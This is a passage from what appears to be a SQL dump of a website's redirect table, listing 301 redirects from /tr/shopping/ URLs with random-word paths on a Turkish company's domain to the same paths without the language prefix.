00:00:00',301),(69345,'https://3s-technologies.com.tr/tr/shopping/inappositely/1973274110.html',NULL,'https://3s-technologies.com.tr/shopping/inappositely/1973274110.html','',1,0,'2026-06-11 01:03:44','0000-00-00 00:00:00',301),(69346,'https://3s-technologies.com.tr/tr/shopping/preludial/2740911236.html',NULL,'https://3s-technologies.com.tr/shopping/preludial/2740911236.html','',1,0,'2026-06-11 01:03:47','0000-00-00 00:00:00',301),(69347,'https://3s-technologies.com.tr/tr/shopping/zabian/978992043.html',NULL,'https://3s-technologies.com.tr/shopping/zabian/978992043.html','',1,0,'2026-06-11 01:03:50','0000-00-00 00:00:00',301),(69348,'https://3s-technologies.com.tr/tr/shopping/tsarina/2894812131.html',NULL,'https://3s-technologies.com.tr/shopping/tsarina/2894812131.html','',1,0,'2026-06-11 01:03:53','0000-00-00 00:00:00',301),(69349,'https://3s-technologies.com.tr/tr/shopping/suavity/3773936391.html',NULL,'https://3s-technologies.com.tr/shopping/suavity/3773936391.html','',1,0,'2026-06-11 01:03:56','0000-00-00 00:00:00',301),(69350,'https://3s-technologies.com.tr/tr/shopping/finicality/1728289260.html',NULL,'https://3s-technologies.com.tr/shopping/finicality/1728289260.html','',1,0,'2026-06-11 01:03:59','0000-00-00 00:00:00',301),(69351,'https://3s-technologies.com.tr/tr/shopping/adopted/1851167021.html',NULL,'https://3s-technologies.com.tr/shopping/adopted/1851167021.html','',1,0,'2026-06-11 01:04:02','0000-00-00 00:00:00',301),(69352,'https://3s-technologies.com.tr/tr/shopping/labialism/2474218297.html',NULL,'https://3s-technologies.com.tr/shopping/labialism/2474218297.html','',1,0,'2026-06-11 01:04:05','0000-00-00 00:00:00',301),(69353,'https://3s-technologies.com.tr/tr/shopping/illlived/1224280068.html',NULL,'https://3s-technologies.com.tr/shopping/illlived/1224280068.html','',1,0,'2026-06-11 01:04:08','0000-00-00 00:00:00',301),(69354,'https://3s-technologies.com.tr/tr/shopping/fordone/1455631895.html',NULL,'https://3s-technologies.com.tr/shopping/fordone/1455631895.html','',1,0,'2026-06-11 01:04:11','0000-00-00 00:00:00',301),(69355,'https://3s-technologies.com.tr/tr/shopping/tendrac/1072631322.html',NULL,'https://3s-technologies.com.tr/shopping/tendrac/1072631322.html','',1,0,'2026-06-11 01:04:14','0000-00-00 00:00:00',301),(69356,'https://3s-technologies.com.tr/tr/shopping/plutocracy/1806165522.html',NULL,'https://3s-technologies.com.tr/shopping/plutocracy/1806165522.html','',1,0,'2026-06-11 01:04:17','0000-00-00 00:00:00',301),(69357,'https://3s-technologies.com.tr/tr/shopping/calcaneal/34209518.html',NULL,'https://3s-technologies.com.tr/shopping/calcaneal/34209518.html','',1,0,'2026-06-11 01:04:20','0000-00-00 00:00:00',301),(69358,'https://3s-technologies.com.tr/tr/shopping/absentation/3803173886.html',NULL,'https://3s-technologies.com.tr/shopping/absentation/3803173886.html','',1,0,'2026-06-11 01:04:23','0000-00-00 00:00:00',301),(69359,'https://3s-technologies.com.tr/tr/shopping/elatine/1687105861.html',NULL,'https://3s-technologies.com.tr/shopping/elatine/1687105861.html','',1,0,'2026-06-11 01:04:26','0000-00-00 00:00:00',301),(69360,'https://3s-technologies.com.tr/tr/shopping/placophora/2846433943.html',NULL,'https://3s-technologies.com.tr/shopping/placophora/2846433943.html','',1,0,'2026-06-11 01:04:36','0000-00-00 00:00:00',301),(69361,'https://3s-technologies.com.tr/tr/shopping/tormentress/1972062011.html',NULL,'https://3s-technologies.com.tr/shopping/tormentress/1972062011.html','',1,0,'2026-06-11 01:04:38','0000-00-00 00:00:00',301),(69362,'https://3s-technologies.com.tr/tr/shopping/fanfaronade/1344733647.html',NULL,'https://3s-technologies.com.tr/shopping/fanfaronade/1344733647.html','',1,0,'2026-06-11 01:04:41','0000-00-00 00:00:00',301),(69363,'https://3s-technologies.com.tr/tr/shopping/forficatus/3538758706.html',NULL,'https://3s-technologies.com.tr/shopping/forficatus/3538758706.html','',1,0,'2026-06-11 01:04:44','0000-00-00 00:00:00',301),(69364,'https://3s-technologies.com.tr/tr/shopping/monovalent/2089138869.html',NULL,'https://3s-technologies.com.tr/shopping/monovalent/2089138869.html','',1,0,'2026-06-11 01:04:47','0000-00-00 00:00:00',301),(69365,'https://3s-technologies.com.tr/tr/shopping/isatine/3454080588.html',NULL,'https://3s-technologies.com.tr/shopping/isatine/3454080588.html','',1,0,'2026-06-11 01:04:50','0000-00-00 00:00:00',301),(69366,'https://3s-technologies.com.tr/tr/shopping/umbrosa/2647031687.html',NULL,'https://3s-technologies.com.tr/shopping/umbrosa/2647031687.html','',1,0,'2026-06-11 01:04:53','0000-00-00 00:00:00',301),(69367,'https://3s-technologies.com.tr/tr/shopping/conniver/3069426473.html',NULL,'https://3s-technologies.com.tr/shopping/conniver/3069426473.html','',1,0,'2026-06-11 01:04:56','0000-00-00 00:00:00',301),(69368,'https://3s-technologies.com.tr/tr/shopping/beatificate/1920914283.html',NULL,'https://3s-technologies.com.tr/shopping/beatificate/1920914283.html','',1,0,'2026-06-11 01:04:59','0000-00-00 00:00:00',301),(69369,'https://3s-technologies.com.tr/tr/shopping/semiabstract/998164146.html',NULL,'https://3s-technologies.com.tr/shopping/semiabstract/998164146.html','',1,0,'2026-06-11 01:05:02','0000-00-00 00:00:00',301),(69370,'https://3s-technologies.com.tr/tr/shopping/apostolicalness/472949419.html',NULL,'https://3s-technologies.com.tr/shopping/apostolicalness/472949419.html','',1,0,'2026-06-11 01:05:05','0000-00-00 00:00:00',301),(69371,'https://3s-technologies.com.tr/tr/shopping/biflabellate/3080209984.html',NULL,'https://3s-technologies.com.tr/shopping/biflabellate/3080209984.html','',1,0,'2026-06-11 01:05:08','0000-00-00 00:00:00',301),(69372,'https://3s-technologies.com.tr/tr/shopping/happily/2780322994.html',NULL,'https://3s-technologies.com.tr/shopping/happily/2780322994.html','',1,0,'2026-06-11 01:05:11','0000-00-00 00:00:00',301),(69373,'https://3s-technologies.com.tr/tr/shopping/impartial/2365125018.html',NULL,'https://3s-technologies.com.tr/shopping/impartial/2365125018.html','',1,0,'2026-06-11 01:05:19','0000-00-00 00:00:00',301),(69374,'https://3s-technologies.com.tr/tr/shopping/juniperin/3882007266.html',NULL,'https://3s-technologies.com.tr/shopping/juniperin/3882007266.html','',1,0,'2026-06-11 01:05:24','0000-00-00 00:00:00',301),(69375,'https://3s-technologies.com.tr/tr/shopping/sarking/256045237.html',NULL,'https://3s-technologies.com.tr/shopping/sarking/256045237.html','',1,0,'2026-06-11 01:05:27','0000-00-00 00:00:00',301),(69376,'https://3s-technologies.com.tr/tr/shopping/protuberance/1723297265.html',NULL,'https://3s-technologies.com.tr/shopping/protuberance/1723297265.html','',1,0,'2026-06-11 01:05:30','0000-00-00 00:00:00',301),(69377,'https://3s-technologies.com.tr/tr/shopping/deliberative/2269424786.html',NULL,'https://3s-technologies.com.tr/shopping/deliberative/2269424786.html','',1,0,'2026-06-11 01:05:33','0000-00-00 00:00:00',301),(69378,'https://3s-technologies.com.tr/tr/shopping/fishtail/462262402.html',NULL,'https://3s-technologies.com.tr/shopping/fishtail/462262402.html','',1,0,'2026-06-11 01:05:36','0000-00-00 00:00:00',301),(69379,'https://3s-technologies.com.tr/tr/shopping/testa/1850426037.html',NULL,'https://3s-technologies.com.tr/shopping/testa/1850426037.html','',1,0,'2026-06-11 01:05:39','0000-00-00 00:00:00',301),(69380,'https://3s-technologies.com.tr/tr/shopping/postable/2037933292.html',NULL,'https://3s-technologies.com.tr/shopping/postable/2037933292.html','',1,0,'2026-06-11 01:05:42','0000-00-00 00:00:00',301),(69381,'https://3s-technologies.com.tr/tr/shopping/attle/3850558802.html',NULL,'https://3s-technologies.com.tr/shopping/attle/3850558802.html','',1,0,'2026-06-11 01:05:45','0000-00-00 00:00:00',301),(69382,'https://3s-technologies.com.tr/tr/shopping/unkindredly/2656970548.html',NULL,'https://3s-technologies.com.tr/shopping/unkindredly/2656970548.html','',1,0,'2026-06-11 01:05:48','0000-00-00 00:00:00',301),(69383,'https://3s-technologies.com.tr/tr/shopping/vicinity/3413217047.html',NULL,'https://3s-technologies.com.tr/shopping/vicinity/3413217047.html','',1,0,'2026-06-11 01:05:51','0000-00-00 00:00:00',301),(69384,'https://3s-technologies.com.tr/tr/shopping/reliant/249128352.html',NULL,'https://3s-technologies.com.tr/shopping/reliant/249128352.html','',1,0,'2026-06-11 01:05:54','0000-00-00 00:00:00',301),(69385,'https://3s-technologies.com.tr/tr/shopping/calfkill/186088680.html',NULL,'https://3s-technologies.com.tr/shopping/calfkill/186088680.html','',1,0,'2026-06-11 01:05:57','0000-00-00 00:00:00',301),(69386,'https://3s-technologies.com.tr/tr/shopping/gawkier/2742836158.html',NULL,'https://3s-technologies.com.tr/shopping/gawkier/2742836158.html','',1,0,'2026-06-11 01:06:00','0000-00-00 00:00:00',301),(69387,'https://3s-technologies.com.tr/tr/shopping/jamdanee/3967163687.html',NULL,'https://3s-technologies.com.tr/shopping/jamdanee/3967163687.html','',1,0,'2026-06-11 01:06:06','0000-00-00 00:00:00',301),(69388,'https://3s-technologies.com.tr/tr/shopping/decompoundable/2157236270.html',NULL,'https://3s-technologies.com.tr/shopping/decompoundable/2157236270.html','',1,0,'2026-06-11 01:06:10','0000-00-00 00:00:00',301),(69389,'https://3s-technologies.com.tr/tr/shopping/adsorb/3228953156.html',NULL,'https://3s-technologies.com.tr/shopping/adsorb/3228953156.html','',1,0,'2026-06-11 01:06:13','0000-00-00 00:00:00',301),(69390,'https://3s-technologies.com.tr/tr/shopping/whitely/1189106912.html',NULL,'https://3s-technologies.com.tr/shopping/whitely/1189106912.html','',1,0,'2026-06-11 01:06:16','0000-00-00 00:00:00',301),(69391,'https://3s-technologies.com.tr/tr/shopping/tongo/4128637110.html',NULL,'https://3s-technologies.com.tr/shopping/tongo/4128637110.html','',1,0,'2026-06-11 01:06:19','0000-00-00 00:00:00',301),(69392,'https://3s-technologies.com.tr/tr/shopping/zeros/3115057.html',NULL,'https://3s-technologies.com.tr/shopping/zeros/3115057.html','',1,0,'2026-06-11 01:06:22','0000-00-00 00:00:00',301),(69393,'https://3s-technologies.com.tr/tr/shopping/cunctation/726954274.html',NULL,'https://3s-technologies.com.tr/shopping/cunctation/726954274.html','',1,0,'2026-06-11 01:06:25','0000-00-00 00:00:00',301),(69394,'https://3s-technologies.com.tr/tr/shopping/potboy/3395015367.html',NULL,'https://3s-technologies.com.tr/shopping/potboy/3395015367.html','',1,0,'2026-06-11 01:06:28','0000-00-00 00:00:00',301),(69395,'https://3s-technologies.com.tr/tr/shopping/fowlerite/860693667.html',NULL,'https://3s-technologies.com.tr/shopping/fowlerite/860693667.html','',1,0,'2026-06-11 01:06:31','0000-00-00 00:00:00',301),(69396,'https://3s-technologies.com.tr/tr/shopping/unsorted/2584667946.html',NULL,'https://3s-technologies.com.tr/shopping/unsorted/2584667946.html','',1,0,'2026-06-11 01:06:34','0000-00-00 00:00:00',301),(69397,'https://3s-technologies.com.tr/tr/shopping/strangler/4093544784.html',NULL,'https://3s-technologies.com.tr/shopping/strangler/4093544784.html','',1,0,'2026-06-11 01:06:37','0000-00-00 00:00:00',301),(69398,'https://3s-technologies.com.tr/tr/shopping/robustious/93359715.html',NULL,'https://3s-technologies.com.tr/shopping/robustious/93359715.html','',1,0,'2026-06-11 01:06:40','0000-00-00 00:00:00',301),(69399,'https://3s-technologies.com.tr/tr/shopping/interruptively/3517364132.html',NULL,'https://3s-technologies.com.tr/shopping/interruptively/3517364132.html','',1,0,'2026-06-11 01:06:43','0000-00-00 00:00:00',301),(69400,'https://3s-technologies.com.tr/tr/shopping/intergrave/4084847726.html',NULL,'https://3s-technologies.com.tr/shopping/intergrave/4084847726.html','',1,0,'2026-06-11 01:06:46','0000-00-00 00:00:00',301),(69401,'https://3s-technologies.com.tr/tr/shopping/undecency/3501750189.html',NULL,'https://3s-technologies.com.tr/shopping/undecency/3501750189.html','',1,0,'2026-06-11 01:06:49','0000-00-00 00:00:00',301),(69402,'https://3s-technologies.com.tr/tr/shopping/insupportable/575901072.html',NULL,'https://3s-technologies.com.tr/shopping/insupportable/575901072.html','',1,0,'2026-06-11 01:06:52','0000-00-00 00:00:00',301),(69403,'https://3s-technologies.com.tr/tr/shopping/acceptably/428727501.html',NULL,'https://3s-technologies.com.tr/shopping/acceptably/428727501.html','',1,0,'2026-06-11 01:06:55','0000-00-00 00:00:00',301),(69404,'https://3s-technologies.com.tr/tr/shopping/prefatory/3136008569.html',NULL,'https://3s-technologies.com.tr/shopping/prefatory/3136008569.html','',1,0,'2026-06-11 01:06:58','0000-00-00 00:00:00',301),(69405,'https://3s-technologies.com.tr/tr/shopping/elsepostnominal/3715843031.html',NULL,'https://3s-technologies.com.tr/shopping/elsepostnominal/3715843031.html','',1,0,'2026-06-11 01:07:01','0000-00-00 00:00:00',301),(69406,'https://3s-technologies.com.tr/tr/shopping/extraction/967428473.html',NULL,'https://3s-technologies.com.tr/shopping/extraction/967428473.html','',1,0,'2026-06-11 01:07:04','0000-00-00 00:00:00',301),(69407,'https://3s-technologies.com.tr/tr/shopping/aggregating/595553693.html',NULL,'https://3s-technologies.com.tr/shopping/aggregating/595553693.html','',1,0,'2026-06-11 01:07:07','0000-00-00 00:00:00',301),(69408,'https://3s-technologies.com.tr/tr/shopping/bilander/1471976609.html',NULL,'https://3s-technologies.com.tr/shopping/bilander/1471976609.html','',1,0,'2026-06-11 01:07:10','0000-00-00 00:00:00',301),(69409,'https://3s-technologies.com.tr/tr/shopping/deliberately/1103557510.html',NULL,'https://3s-technologies.com.tr/shopping/deliberately/1103557510.html','',1,0,'2026-06-11 01:07:13','0000-00-00 00:00:00',301),(69410,'https://3s-technologies.com.tr/tr/shopping/ferae/2257187516.html',NULL,'https://3s-technologies.com.tr/shopping/ferae/2257187516.html','',1,0,'2026-06-11 01:07:16','0000-00-00 00:00:00',301),(69411,'https://3s-technologies.com.tr/tr/shopping/againstand/3876042840.html',NULL,'https://3s-technologies.com.tr/shopping/againstand/3876042840.html','',1,0,'2026-06-11 01:07:19','0000-00-00 00:00:00',301),(69412,'https://3s-technologies.com.tr/tr/shopping/terrorize/2816013082.html',NULL,'https://3s-technologies.com.tr/shopping/terrorize/2816013082.html','',1,0,'2026-06-11 01:07:22','0000-00-00 00:00:00',301),(69413,'https://3s-technologies.com.tr/tr/shopping/belectured/3755650792.html',NULL,'https://3s-technologies.com.tr/shopping/belectured/3755650792.html','',1,0,'2026-06-11 01:07:25','0000-00-00 00:00:00',301),(69414,'https://3s-technologies.com.tr/tr/shopping/mulse/4247445679.html',NULL,'https://3s-technologies.com.tr/shopping/mulse/4247445679.html','',1,0,'2026-06-11 01:07:28','0000-00-00 00:00:00',301),(69415,'https://3s-technologies.com.tr/tr/shopping/populating/4119979114.html',NULL,'https://3s-technologies.com.tr/shopping/populating/4119979114.html','',1,0,'2026-06-11 01:07:31','0000-00-00 00:00:00',301),(69416,'https://3s-technologies.com.tr/tr/shopping/workmanship/2278687716.html',NULL,'https://3s-technologies.com.tr/shopping/workmanship/2278687716.html','',1,0,'2026-06-11 01:07:34','0000-00-00 00:00:00',301),(69417,'https://3s-technologies.com.tr/tr/shopping/cooperated/396883002.html',NULL,'https://3s-technologies.com.tr/shopping/cooperated/396883002.html','',1,0,'2026-06-11 01:07:37','0000-00-00 00:00:00',301),(69418,'https://3s-technologies.com.tr/tr/shopping/flush/2337959949.html',NULL,'https://3s-technologies.com.tr/shopping/flush/2337959949.html','',1,0,'2026-06-11 01:07:40','0000-00-00 00:00:00',301),(69419,'https://3s-technologies.com.tr/tr/shopping/restharrow/353275437.html',NULL,'https://3s-technologies.com.tr/shopping/restharrow/353275437.html','',1,0,'2026-06-11 01:07:43','0000-00-00 00:00:00',301),(69420,'https://3s-technologies.com.tr/tr/shopping/daggle/2109976286.html',NULL,'https://3s-technologies.com.tr/shopping/daggle/2109976286.html','',1,0,'2026-06-11 01:07:46','0000-00-00 00:00:00',301),(69421,'https://3s-technologies.com.tr/tr/shopping/potentiality/747598448.html',NULL,'https://3s-technologies.com.tr/shopping/potentiality/747598448.html','',1,0,'2026-06-11 01:07:49','0000-00-00 00:00:00',301),(69422,'https://3s-technologies.com.tr/tr/shopping/quartet/4205301273.html',NULL,'https://3s-technologies.com.tr/shopping/quartet/4205301273.html','',1,0,'2026-06-11 01:07:52','0000-00-00 00:00:00',301),(69423,'https://3s-technologies.com.tr/tr/shopping/yellowish/2503547972.html',NULL,'https://3s-technologies.com.tr/shopping/yellowish/2503547972.html','',1,0,'2026-06-11 01:07:55','0000-00-00 00:00:00',301),(69424,'https://3s-technologies.com.tr/tr/shopping/quickwitted/4119815591.html',NULL,'https://3s-technologies.com.tr/shopping/quickwitted/4119815591.html','',1,0,'2026-06-11 01:07:58','0000-00-00 00:00:00',301),(69425,'https://3s-technologies.com.tr/tr/shopping/deception/3137220684.html',NULL,'https://3s-technologies.com.tr/shopping/deception/3137220684.html','',1,0,'2026-06-11 01:08:01','0000-00-00 00:00:00',301),(69426,'https://3s-technologies.com.tr/tr/shopping/protoplasmatic/910447477.html',NULL,'https://3s-technologies.com.tr/shopping/protoplasmatic/910447477.html','',1,0,'2026-06-11 01:08:04','0000-00-00 00:00:00',301),(69427,'https://3s-technologies.com.tr/tr/shopping/sheepbite/160682795.html',NULL,'https://3s-technologies.com.tr/shopping/sheepbite/160682795.html','',1,0,'2026-06-11 01:08:07','0000-00-00 00:00:00',301),(69428,'https://3s-technologies.com.tr/tr/shopping/chirology/2787837641.html',NULL,'https://3s-technologies.com.tr/shopping/chirology/2787837641.html','',1,0,'2026-06-11 01:08:10','0000-00-00 00:00:00',301),(69429,'https://3s-technologies.com.tr/tr/shopping/taboret/1533979288.html',NULL,'https://3s-technologies.com.tr/shopping/taboret/1533979288.html','',1,0,'2026-06-11 01:08:13','0000-00-00 00:00:00',301),(69430,'https://3s-technologies.com.tr/tr/shopping/sideboard/190677484.html',NULL,'https://3s-technologies.com.tr/shopping/sideboard/190677484.html','',1,0,'2026-06-11 01:08:16','0000-00-00 00:00:00',301),(69431,'https://3s-technologies.com.tr/tr/shopping/crackerjack/2530716114.html',NULL,'https://3s-technologies.com.tr/shopping/crackerjack/2530716114.html','',1,0,'2026-06-11 01:08:19','0000-00-00 00:00:00',301),(69432,'https://3s-technologies.com.tr/tr/shopping/lineolate/1873138368.html',NULL,'https://3s-technologies.com.tr/shopping/lineolate/1873138368.html','',1,0,'2026-06-11 01:08:22','0000-00-00 00:00:00',301),(69433,'https://3s-technologies.com.tr/tr/shopping/bemock/2299104663.html',NULL,'https://3s-technologies.com.tr/shopping/bemock/2299104663.html','',1,0,'2026-06-11 01:08:25','0000-00-00 00:00:00',301),(69434,'https://3s-technologies.com.tr/tr/shopping/intertie/1987965282.html',NULL,'https://3s-technologies.com.tr/shopping/intertie/1987965282.html','',1,0,'2026-06-11 01:08:28','0000-00-00 00:00:00',301),(69435,'https://3s-technologies.com.tr/tr/shopping/phytotomy/3820179709.html',NULL,'https://3s-technologies.com.tr/shopping/phytotomy/3820179709.html','',1,0,'2026-06-11 01:08:31','0000-00-00 00:00:00',301),(69436,'https://3s-technologies.com.tr/tr/shopping/beatable/4272851580.html',NULL,'https://3s-technologies.com.tr/shopping/beatable/4272851580.html','',1,0,'2026-06-11 01:08:34','0000-00-00 00:00:00',301),(69437,'https://3s-technologies.com.tr/tr/shopping/globing/1876515057.html',NULL,'https://3s-technologies.com.tr/shopping/globing/1876515057.html','',1,0,'2026-06-11 01:08:37','0000-00-00 00:00:00',301),(69438,'https://3s-technologies.com.tr/tr/shopping/increating/3912899242.html',NULL,'https://3s-technologies.com.tr/shopping/increating/3912899242.html','',1,0,'2026-06-11 01:08:40','0000-00-00 00:00:00',301),(69439,'https://3s-technologies.com.tr/tr/shopping/subsumable/991700444.html',NULL,'https://3s-technologies.com.tr/shopping/subsumable/991700444.html','',1,0,'2026-06-11 01:08:43','0000-00-00 00:00:00',301),(69440,'https://3s-technologies.com.tr/tr/shopping/confecture/3059344406.html',NULL,'https://3s-technologies.com.tr/shopping/confecture/3059344406.html','',1,0,'2026-06-11 01:08:52','0000-00-00 00:00:00',301),(69441,'https://3s-technologies.com.tr/tr/shopping/adversely/1562837832.html',NULL,'https://3s-technologies.com.tr/shopping/adversely/1562837832.html','',1,0,'2026-06-11 01:08:54','0000-00-00 00:00:00',301),(69442,'https://3s-technologies.com.tr/tr/shopping/misericorde/2430033271.html',NULL,'https://3s-technologies.com.tr/shopping/misericorde/2430033271.html','',1,0,'2026-06-11 01:08:57','0000-00-00 00:00:00',301),(69443,'https://3s-technologies.com.tr/tr/shopping/basted/1523426090.html',NULL,'https://3s-technologies.com.tr/shopping/basted/1523426090.html','',1,0,'2026-06-11 01:09:00','0000-00-00 00:00:00',301),(69444,'https://3s-technologies.com.tr/tr/shopping/philander/928888015.html',NULL,'https://3s-technologies.com.tr/shopping/philander/928888015.html','',1,0,'2026-06-11 01:09:03','0000-00-00 00:00:00',301),(69445,'https://3s-technologies.com.tr/tr/shopping/efface/3163491491.html',NULL,'https://3s-technologies.com.tr/shopping/efface/3163491491.html','',1,0,'2026-06-11 01:09:06','0000-00-00 00:00:00',301),(69446,'https://3s-technologies.com.tr/tr/shopping/tempestuously/2800477292.html',NULL,'https://3s-technologies.com.tr/shopping/tempestuously/2800477292.html','',1,0,'2026-06-11 01:09:09','0000-00-00 00:00:00',301),(69447,'https://3s-technologies.com.tr/tr/shopping/coudee/45510539.html',NULL,'https://3s-technologies.com.tr/shopping/coudee/45510539.html','',1,0,'2026-06-11 01:09:12','0000-00-00 00:00:00',301),(69448,'https://3s-technologies.com.tr/tr/shopping/electromuscular/1295841702.html',NULL,'https://3s-technologies.com.tr/shopping/electromuscular/1295841702.html','',1,0,'2026-06-11 01:09:15','0000-00-00 00:00:00',301),(69449,'https://3s-technologies.com.tr/tr/shopping/spacially/3015555022.html',NULL,'https://3s-technologies.com.tr/shopping/spacially/3015555022.html','',1,0,'2026-06-11 01:09:19','0000-00-00 00:00:00',301),(69450,'https://3s-technologies.com.tr/tr/shopping/burnt/1833070983.html',NULL,'https://3s-technologies.com.tr/shopping/burnt/1833070983.html','',1,0,'2026-06-11 01:09:21','0000-00-00 00:00:00',301),(69451,'https://3s-technologies.com.tr/tr/shopping/selfconscious/688099004.html',NULL,'https://3s-technologies.com.tr/shopping/selfconscious/688099004.html','',1,0,'2026-06-11 01:09:24','0000-00-00 00:00:00',301),(69452,'https://3s-technologies.com.tr/tr/shopping/arhat/2579000036.html',NULL,'https://3s-technologies.com.tr/shopping/arhat/2579000036.html','',1,0,'2026-06-11 01:09:27','0000-00-00 00:00:00',301),(69453,'https://3s-technologies.com.tr/tr/shopping/decahedral/1137092427.html',NULL,'https://3s-technologies.com.tr/shopping/decahedral/1137092427.html','',1,0,'2026-06-11 01:09:30','0000-00-00 00:00:00',301),(69454,'https://3s-technologies.com.tr/tr/shopping/douse/1204642718.html',NULL,'https://3s-technologies.com.tr/shopping/douse/1204642718.html','',1,0,'2026-06-11 01:09:33','0000-00-00 00:00:00',301),(69455,'https://3s-technologies.com.tr/tr/shopping/respectability/3476659084.html',NULL,'https://3s-technologies.com.tr/shopping/respectability/3476659084.html','',1,0,'2026-06-11 01:09:41','0000-00-00 00:00:00',301),(69456,'https://3s-technologies.com.tr/tr/shopping/persienne/853208708.html',NULL,'https://3s-technologies.com.tr/shopping/persienne/853208708.html','',1,0,'2026-06-11 01:09:45','0000-00-00 00:00:00',301),(69457,'https://3s-technologies.com.tr/tr/shopping/builders/3648292740.html',NULL,'https://3s-technologies.com.tr/shopping/builders/3648292740.html','',1,0,'2026-06-11 01:09:48','0000-00-00 00:00:00',301),(69458,'https://3s-technologies.com.tr/tr/shopping/subcuticular/3645705035.html',NULL,'https://3s-technologies.com.tr/shopping/subcuticular/3645705035.html','',1,0,'2026-06-11 01:09:51','0000-00-00 00:00:00',301),(69459,'https://3s-technologies.com.tr/tr/shopping/received/2894234702.html',NULL,'https://3s-technologies.com.tr/shopping/received/2894234702.html','',1,0,'2026-06-11 01:09:54','0000-00-00 00:00:00',301),(69460,'https://3s-technologies.com.tr/tr/shopping/elbowboard/2575363755.html',NULL,'https://3s-technologies.com.tr/shopping/elbowboard/2575363755.html','',1,0,'2026-06-11 01:09:57','0000-00-00 00:00:00',301),(69461,'https://3s-technologies.com.tr/tr/shopping/badgerlegged/2286867409.html',NULL,'https://3s-technologies.com.tr/shopping/badgerlegged/2286867409.html','',1,0,'2026-06-11 01:10:00','0000-00-00 00:00:00',301),(69462,'https://3s-technologies.com.tr/tr/shopping/overrun/1261182287.html',NULL,'https://3s-technologies.com.tr/shopping/overrun/1261182287.html','',1,0,'2026-06-11 01:10:03','0000-00-00 00:00:00',301),(69463,'https://3s-technologies.com.tr/tr/shopping/indeficient/115388943.html',NULL,'https://3s-technologies.com.tr/shopping/indeficient/115388943.html','',1,0,'2026-06-11 01:10:06','0000-00-00 00:00:00',301),(69464,'https://3s-technologies.com.tr/tr/shopping/adolescency/3312761447.html',NULL,'https://3s-technologies.com.tr/shopping/adolescency/3312761447.html','',1,0,'2026-06-11 01:10:10','0000-00-00 00:00:00',301),(69465,'https://3s-technologies.com.tr/tr/shopping/solvable/1134927837.html',NULL,'https://3s-technologies.com.tr/shopping/solvable/1134927837.html','',1,0,'2026-06-11 01:10:13','0000-00-00 00:00:00',301),(69466,'https://3s-technologies.com.tr/tr/shopping/hardgrass/1802047849.html',NULL,'https://3s-technologies.com.tr/shopping/hardgrass/1802047849.html','',1,0,'2026-06-11 01:10:20','0000-00-00 00:00:00',301),(69467,'https://3s-technologies.com.tr/tr/shopping/supermaterial/585164018.html',NULL,'https://3s-technologies.com.tr/shopping/supermaterial/585164018.html','',1,0,'2026-06-11 01:10:24','0000-00-00 00:00:00',301),(69468,'https://3s-technologies.com.tr/tr/shopping/scone/1413871083.html',NULL,'https://3s-technologies.com.tr/shopping/scone/1413871083.html','',1,0,'2026-06-11 01:10:27','0000-00-00 00:00:00',301),(69469,'https://3s-technologies.com.tr/tr/shopping/notched/3350404618.html',NULL,'https://3s-technologies.com.tr/shopping/notched/3350404618.html','',1,0,'2026-06-11 01:10:30','0000-00-00 00:00:00',301),(69470,'https://3s-technologies.com.tr/tr/shopping/inconsistency/3020489152.html',NULL,'https://3s-technologies.com.tr/shopping/inconsistency/3020489152.html','',1,0,'2026-06-11 01:10:34','0000-00-00 00:00:00',301),(69471,'https://3s-technologies.com.tr/tr/shopping/carnivorous/2895446801.html',NULL,'https://3s-technologies.com.tr/shopping/carnivorous/2895446801.html','',1,0,'2026-06-11 01:10:37','0000-00-00 00:00:00',301),(69472,'https://3s-technologies.com.tr/tr/shopping/burro/3487442563.html',NULL,'https://3s-technologies.com.tr/shopping/burro/3487442563.html','',1,0,'2026-06-11 01:10:39','0000-00-00 00:00:00',301),(69473,'https://3s-technologies.com.tr/tr/shopping/hardily/616283221.html',NULL,'https://3s-technologies.com.tr/shopping/hardily/616283221.html','',1,0,'2026-06-11 01:10:42','0000-00-00 00:00:00',301),(69474,'https://3s-technologies.com.tr/tr/shopping/physicological/2527819927.html',NULL,'https://3s-technologies.com.tr/shopping/physicological/2527819927.html','',1,0,'2026-06-11 01:10:45','0000-00-00 00:00:00',301),(69475,'https://3s-technologies.com.tr/tr/shopping/trainman/2023271824.html',NULL,'https://3s-technologies.com.tr/shopping/trainman/2023271824.html','',1,0,'2026-06-11 01:10:48','0000-00-00 00:00:00',301),(69476,'https://3s-technologies.com.tr/tr/shopping/squamulae/3893648986.html',NULL,'https://3s-technologies.com.tr/shopping/squamulae/3893648986.html','',1,0,'2026-06-11 01:10:51','0000-00-00 00:00:00',301),(69477,'https://3s-technologies.com.tr/tr/shopping/irestone/2232915545.html',NULL,'https://3s-technologies.com.tr/shopping/irestone/2232915545.html','',1,0,'2026-06-11 01:10:54','0000-00-00 00:00:00',301),(69478,'https://3s-technologies.com.tr/tr/shopping/cetacea/2238879955.html',NULL,'https://3s-technologies.com.tr/shopping/cetacea/2238879955.html','',1,0,'2026-06-11 01:10:57','0000-00-00 00:00:00',301),(69479,'https://3s-technologies.com.tr/tr/shopping/underlaborer/1606281906.html',NULL,'https://3s-technologies.com.tr/shopping/underlaborer/1606281906.html','',1,0,'2026-06-11 01:11:00','0000-00-00 00:00:00',301),(69480,'https://3s-technologies.com.tr/tr/shopping/laughably/2869964946.html',NULL,'https://3s-technologies.com.tr/shopping/laughably/2869964946.html','',1,0,'2026-06-11 01:11:03','0000-00-00 00:00:00',301),(69481,'https://3s-technologies.com.tr/tr/shopping/mastoiditis/4277603875.html',NULL,'https://3s-technologies.com.tr/shopping/mastoiditis/4277603875.html','',1,0,'2026-06-11 01:11:06','0000-00-00 00:00:00',301),(69482,'https://3s-technologies.com.tr/tr/shopping/replica/3052542550.html',NULL,'https://3s-technologies.com.tr/shopping/replica/3052542550.html','',1,0,'2026-06-11 01:11:09','0000-00-00 00:00:00',301),(69483,'https://3s-technologies.com.tr/tr/shopping/matinee/3372908018.html',NULL,'https://3s-technologies.com.tr/shopping/matinee/3372908018.html','',1,0,'2026-06-11 01:11:12','0000-00-00 00:00:00',301),(69484,'https://3s-technologies.com.tr/tr/shopping/incidental/487744257.html',NULL,'https://3s-technologies.com.tr/shopping/incidental/487744257.html','',1,0,'2026-06-11 01:11:16','0000-00-00 00:00:00',301),(69485,'https://3s-technologies.com.tr/tr/shopping/gimcrack/488956340.html',NULL,'https://3s-technologies.com.tr/shopping/gimcrack/488956340.html','',1,0,'2026-06-11 01:11:18','0000-00-00 